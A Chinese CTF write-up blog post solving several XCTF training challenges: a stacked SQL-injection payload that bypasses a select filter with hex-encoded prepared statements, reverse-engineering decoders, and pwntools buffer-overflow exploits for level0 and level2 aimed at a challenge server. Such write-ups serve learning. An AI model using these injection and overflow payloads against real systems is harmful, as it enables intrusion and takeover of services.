攻防世界之我是菜鸡
date
Aug 5, 2021 12:17 PM
Related to 日程数据 1 (blog)
tags
Writeup
slug
web2
summary
go on
0x0e supersqli



因为select被过滤了,所以先将select * from 1919810931114514
进行16进制编码
再通过构造payload得
;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#
进而得到flag
prepare…from…是预处理语句,会进行编码转换。
execute用来执行由SQLPrepare创建的SQL语句。
SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值。
open-source
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
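/*
 * Key-check program from the "open-source" challenge.
 *
 * Expects exactly three arguments:
 *   argv[1]  decimal number that must equal 0xcafe (51966)
 *   argv[2]  decimal number n with n % 5 != 3 and n % 17 == 8
 *   argv[3]  the literal string "h4cky0u"
 * On success prints a 32-bit key derived from the inputs and returns 0; on
 * failure prints a hint and returns 1..4, identifying which check failed.
 */
int main(int argc, char *argv[]) {
    if (argc != 4) {
        printf("what?\n");
        return 1;
    }
    /* strtoul instead of atoi: atoi is undefined on out-of-range input while
     * strtoul saturates; for in-range decimal input both give the same value. */
    unsigned int first = (unsigned int)strtoul(argv[1], NULL, 10);
    if (first != 0xcafe) {
        printf("you are wrong, sorry.\n");
        return 2;
    }
    unsigned int second = (unsigned int)strtoul(argv[2], NULL, 10);
    if (second % 5 == 3 || second % 17 != 8) {
        printf("ha, you won't get it!\n");
        return 3;
    }
    if (strcmp("h4cky0u", argv[3]) != 0) {
        printf("so close, dude!\n");
        return 4;
    }
    printf("Brr wrrr grr\n");
    /* Only second % 17 (always 8 once the check above passes) and the length
     * of argv[3] feed the key, so every accepted input set yields the same
     * value; unsigned arithmetic wraps modulo 2^32, which is intended. */
    unsigned int hash = first * 31337u + (second % 17) * 11u
                      + (unsigned int)strlen(argv[3]) - 1615810207u;
    printf("Get your key: ");
    printf("%x\n", hash);
    return 0;
}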
atoi (表示ascii to integer)
./string 51966 25 h4cky0u
或者 去判断
#include <stdio.h>
#include <string.h>
/*
 * Reproduce the key printed by the challenge program for the one accepted
 * input set: argv[1] == 0xcafe, argv[2] % 17 == 8, argv[3] == "h4cky0u".
 */
int main(void) {
    const unsigned int first = 0xcafe;        /* value the first check requires */
    const unsigned int second_mod_17 = 8;     /* what the second check pins down */
    const size_t key_len = strlen("h4cky0u"); /* length of the required third argument */
    unsigned int hash = first * 31337 + second_mod_17 * 11 + key_len - 1615810207;
    printf("Get your key: ");
    printf("%x\n", hash);
    return 0;
}

hello ctf


simple-unpack


这是有壳啊




logmein




适量N

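# logmein: the stored string is the flag XOR-ed with a repeating key.
var28 = "harambe"               # XOR key, reused cyclically
var20 = ":\"AL_RT^L*.?+6/46"    # obfuscated flag bytes as stored in the binary
# Undo the XOR byte by byte. Using len(var28) instead of the literal 7 keeps
# the decoder correct if the key is ever changed.
flag = "".join(
    chr(ord(c) ^ ord(var28[i % len(var28)])) for i, c in enumerate(var20)
)
print(flag)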

no-strings-attached


X追踪一下


要解密


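# no-strings-attached: dump of the encrypted flag as 4-byte groups. The decoder
# only uses the first byte of each group (the second byte is 0x14 in every
# group and the last two are zero; they are discarded).
buf = [
    0x3a, 0x14, 0x00, 0x00, 0x36, 0x14, 0x00, 0x00,
    0x37, 0x14, 0x00, 0x00, 0x3b, 0x14, 0x00, 0x00,
    0x80, 0x14, 0x00, 0x00, 0x7a, 0x14, 0x00, 0x00,
    0x71, 0x14, 0x00, 0x00, 0x78, 0x14, 0x00, 0x00,
    0x63, 0x14, 0x00, 0x00, 0x66, 0x14, 0x00, 0x00,
    0x73, 0x14, 0x00, 0x00, 0x67, 0x14, 0x00, 0x00,
    0x62, 0x14, 0x00, 0x00, 0x65, 0x14, 0x00, 0x00,
    0x73, 0x14, 0x00, 0x00, 0x60, 0x14, 0x00, 0x00,
    0x6b, 0x14, 0x00, 0x00, 0x71, 0x14, 0x00, 0x00,
    0x78, 0x14, 0x00, 0x00, 0x6a, 0x14, 0x00, 0x00,
    0x73, 0x14, 0x00, 0x00, 0x70, 0x14, 0x00, 0x00,
    0x64, 0x14, 0x00, 0x00, 0x78, 0x14, 0x00, 0x00,
    0x6e, 0x14, 0x00, 0x00, 0x70, 0x14, 0x00, 0x00,
    0x70, 0x14, 0x00, 0x00, 0x64, 0x14, 0x00, 0x00,
    0x70, 0x14, 0x00, 0x00, 0x64, 0x14, 0x00, 0x00,
    0x6e, 0x14, 0x00, 0x00, 0x7b, 0x14, 0x00, 0x00,
    0x76, 0x14, 0x00, 0x00, 0x78, 0x14, 0x00, 0x00,
    0x6a, 0x14, 0x00, 0x00, 0x73, 0x14, 0x00, 0x00,
    0x7b, 0x14, 0x00, 0x00, 0x80, 0x14, 0x00, 0x00,
]
# Keep the first byte of every 4-byte group.
f = buf[::4]
print(f)
# Each kept byte was shifted up by a repeating key 1,2,3,4,5; shift it back.
nu = [1, 2, 3, 4, 5]
fl = "".join(chr(b - nu[j % len(nu)]) for j, b in enumerate(f))
print(fl)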
getit


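# getit: every character of the stored string is off by one from the real one,
# with the direction alternating by position: even indices were stored +1 (so
# subtract 1), odd indices were stored -1 (so add 1).
s = 'c61b68366edeb7bdce3c6820314b7498'
flag = ''.join(chr(ord(c) + (1 if i & 1 else -1)) for i, c in enumerate(s))
print(flag)
# Result: b70c59275fcfa8aebf2d5911223c6589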
csaw2013reversing2


打开时必须勾选“以写入模式加载”





参考
EasyRE
看见奇怪的东西

是个幌子

逆向算法
翻车
level0

没啥东西

有提示 点进去

可以输入0x200长度的数据，但 buf 的长度只有0x80

# level0: the challenge binary reads up to 0x200 bytes into a 0x80-byte stack
# buffer (see the note above), so the saved return address can be overwritten.
from pwn import *
r = remote("111.200.241.244", 58379)  # challenge server
# 0x80 bytes fill the buffer, 8 more bytes account for the value popped by
# leave, then the return address is replaced with the entry of the binary's
# callsystem function.
payload = b'A' * 0x80 + b'a' * 0x8 + p64(0x00400596)
r.recvuntil("Hello, World\n")  # wait for the banner (p.recv() would read whatever output is available)
r.sendline(payload)  # send the payload
r.interactive()  # hand the connection over to the user

level2

漏洞函数在前


0x88 大小的缓冲区可被 0x100 的输入覆盖溢出
找想要跳的add system 函数
0x08048320

需要 system('/bin/shell') 的参数字符串，找到该字符串的地址
0x0804a024

构建payload

# Padding up to the return address, then the system address found above
# (0x08048320), a dummy return address (0), and the address of the argument
# string found above (0x0804a024).
payload=b'a'*(0x88+0x4)+p32(0x08048320)+p32(0)+p32(0x0804a024)
# level2: the 0x88-byte buffer is overrun by a 0x100-byte read (see above), so
# the saved return address can be redirected into system with a chosen argument.
from pwn import *
p = remote('111.200.241.244', 60256)  # challenge server
# Alternative that also works: return straight to the call-system instruction
# (0x0804845c) followed only by the argument string address.
#payload = b'a' * (0x88 + 0x4) + p32(0x0804845c) + p32(0x0804A024) # 0x0804845c: address of the call-system instruction
# 0x88 bytes of buffer plus 4 more before the return address, then: the system
# address, a dummy return address (0), and the address of the argument string.
payload=b'a'*(0x88+0x4)+p32(0x08048320)+p32(0)+p32(0x0804a024)
#p.recvuntil("Input:\n")
p.recv()  # consume the prompt
p.sendline(payload)
p.interactive()
两种方式都可以